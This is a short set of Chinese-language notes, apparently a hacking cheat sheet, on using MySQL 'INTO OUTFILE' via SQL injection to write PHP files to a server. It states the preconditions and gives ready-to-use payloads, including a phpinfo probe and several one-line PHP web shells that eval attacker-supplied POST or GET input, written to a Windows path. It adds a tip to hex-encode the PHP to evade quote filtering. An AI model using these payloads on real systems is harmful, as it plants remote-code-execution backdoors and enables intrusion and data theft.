要是想省略单引号的话必须转换十六进制into outfile 写入文件操作

前提：

文件名必须是全路径(绝对路径) 用户必须有写文件的权限

没有对单引号'过滤

select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php' select '<?php @eval($_POST["admin"]); ?>' into outfile

'C:\Windows\tmp\8.php'

路径里面两个反斜杠\可以换成一个正斜杠/

PHP 语句没有单引号的话，必须转换成十六进制要是想省略单引号'的话,必须转换成十六进制

<?php eval($_POST["admin"]); ?> 或 者 <?php eval($_GET["admin"]); ?>

<?php @eval($_POST["admin"]); ?>

<?php phpinfo(); ?>

<?php eval($_POST["admin"]); ?>

建议一句话 PHP 语句转换成十六进制